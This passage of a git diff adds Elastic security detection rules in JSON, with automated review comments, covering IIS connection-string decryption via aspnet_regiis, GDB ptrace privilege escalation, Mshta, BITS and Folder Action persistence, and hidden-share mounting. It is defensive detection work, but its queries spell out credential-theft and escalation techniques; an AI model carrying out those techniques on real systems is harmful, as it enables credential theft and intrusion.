+ { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until 
version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json new file mode 100644 index 00000000000..9102664bfc0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_110.json 
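Review bot: The `index` list includes `logs-windows.*` and `logs-system.security*` and `related_integrations` lists the `windows` and `system` packages, yet `tags` names only `Data Source: Elastic Endgame` and `Data Source: Elastic Defend`, so the rule's coverage of Windows security/Sysmon event sources is not discoverable by tag the way it is in the bfeaf89b rule above (`Data Source: Sysmon`). If the tag taxonomy has entries for those integrations they should be added; otherwise `description` could list the supported data sources. `max_signals: 33` is an unusual limit with no stated rationale; one sentence in `setup` or `note` explaining it would help. The same content appears in the c25e9c87-..._110.json hunk below, which differs only in its `index` list.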
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Connection Strings Decryption", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"aspnet_regiis.exe\" or ?process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not 
added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json new file mode 100644 index 00000000000..1d5425eab2e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c292fa52-4115-408a-b897-e14f684b3cb7_106.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects modification of a Folder Action script. A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized. Adversaries may abuse this feature to establish persistence by utilizing a malicious script.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Folder Action Script", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\") and\n not process.args : \"/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt\"\n ] by process.parent.pid\n", + "references": [ + "https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "c292fa52-4115-408a-b897-e14f684b3cb7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic 
Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c292fa52-4115-408a-b897-e14f684b3cb7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json b/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json new file mode 100644 index 00000000000..261f288159b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c296f888-eac6-4543-8da5-b6abb0d3304f_2.json 
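Review bot: The `description` says the rule "Detects modification of a Folder Action script", but the `query` matches no file modification at all — it is a process sequence in which `com.apple.foundation.UserScriptService` is followed within 5s by a script interpreter spawned as its child, i.e. execution of a Folder Action script. Reword the opening sentence to match, e.g. `"description": "Detects execution of a Folder Action script via com.apple.foundation.UserScriptService. ..."`, keeping the remainder of the text. Both sequence steps are `process where` queries, so the `logs-endpoint.events.process-*` index narrowing applied to other rules in this commit would presumably fit here as well.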
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where GDB (granted the CAP_SYS_PTRACE capability) is executed, after which the user's access is elevated to UID/GID 0 (root). In Linux, the CAP_SYS_PTRACE capability grants a process the ability to use the ptrace system call, which is typically used for debugging and allows the process to trace and control other processes. Attackers may leverage this capability to hook and inject into a process that is running with root permissions in order to escalate their privileges to root.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via GDB CAP_SYS_PTRACE", + "query": "sequence by host.id, process.entry_leader.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"gdb\" and\n (process.thread.capabilities.effective : \"CAP_SYS_PTRACE\" or process.thread.capabilities.permitted : \"CAP_SYS_PTRACE\") and \n user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name != null and user.id == \"0\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.effective", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.thread.capabilities.permitted", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c296f888-eac6-4543-8da5-b6abb0d3304f", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "c296f888-eac6-4543-8da5-b6abb0d3304f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json new file mode 100644 index 00000000000..06f5f13f312 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c2d90150-0133-451c-a783-533e736c12d7_106.json 
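Review bot: The setup text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while the otherwise identical setup block of `c292fa52-4115-408a-b897-e14f684b3cb7_106.json` in this commit links `fleet/current/agent-policy.html`; change it to `current` so the guide does not go stale. Separately, the second sequence step only requires `process.name != null and user.id == "0"` within 1m of the same `process.entry_leader.entity_id`, so any root exec in that session (an ordinary `sudo` invocation after a non-root gdb run, for instance) completes the sequence. If that breadth is deliberate, a sentence in `description` or a `false_positives` entry saying so would help analysts triage the alert.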
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Mshta.exe making outbound network connections. This may indicate adversarial activity, as Mshta is often leveraged by adversaries to execute malicious scripts and evade detection.", + "from": "now-20m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mshta Making Network Connections", + "query": "sequence by process.entity_id with maxspan=10m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n not process.parent.name : \"Microsoft.ConfigurationManagement.exe\" and\n not (process.parent.executable : \"C:\\\\Amazon\\\\Amazon Assistant\\\\amazonAssistantService.exe\" or\n process.parent.executable : \"C:\\\\TeamViewer\\\\TeamViewer.exe\") and\n not process.args : \"ADSelfService_Enroll.hta\"]\n [network where host.os.type == \"windows\" and process.name : \"mshta.exe\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c2d90150-0133-451c-a783-533e736c12d7", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data 
Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c2d90150-0133-451c-a783-533e736c12d7_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json new file mode 100644 index 00000000000..15304917780 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_106.json 
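Review bot: The parent-executable exclusions in `query` use a literal drive letter (`C:\\\\Amazon\\\\Amazon Assistant\\\\amazonAssistantService.exe` and `C:\\\\TeamViewer\\\\TeamViewer.exe`), whereas the other rules in this commit write system paths with the `?:\\\\` drive wildcard (see `c3b915e0-22f3-4bf7-991d-b643513c722f_106.json`); an install on another volume would not be excluded and would alert. Using `?:\\\\` in both paths keeps the exclusions consistent with the rest of the package.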
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program that runs after a job finishes transferring data or after a job enters a specified state in order to persist on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via BITS Job Notify Cmdline", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", + "references": [ + "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", + "https://docs.microsoft.com/en-us/windows/win32/api/bits1_5/nf-bits1_5-ibackgroundcopyjob2-setnotifycmdline", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", + "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", + 
"setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "c3b915e0-22f3-4bf7-991d-b643513c722f_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json new file mode 100644 index 00000000000..808171f3017 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c3b915e0-22f3-4bf7-991d-b643513c722f_107.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can use the Background Intelligent Transfer Service (BITS) SetNotifyCmdLine method to execute a program that runs after a job finishes transferring data or after a job enters a specified state in order to persist on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via BITS Job Notify Cmdline", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.parent.args : \"BITS\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\WINDOWS\\\\system32\\\\directxdatabaseupdater.exe\")\n", + "references": [ + "https://pentestlab.blog/2019/10/30/persistence-bits-jobs/", + "https://docs.microsoft.com/en-us/windows/win32/api/bits1_5/nf-bits1_5-ibackgroundcopyjob2-setnotifycmdline", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-setnotifycmdline", + "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c3b915e0-22f3-4bf7-991d-b643513c722f", 
+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1197", + "name": "BITS Jobs", + "reference": "https://attack.mitre.org/techniques/T1197/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c3b915e0-22f3-4bf7-991d-b643513c722f_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json new file mode 100644 index 00000000000..7aa80ba0353 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108.json 
@@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of net.exe to mount a WebDav or hidden remote share. This may indicate lateral movement or preparation for data exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mounting Hidden or WebDav Remote Shares", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, 
users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 108 + }, + "id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json new file mode 100644 index 00000000000..85510428982 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109.json 
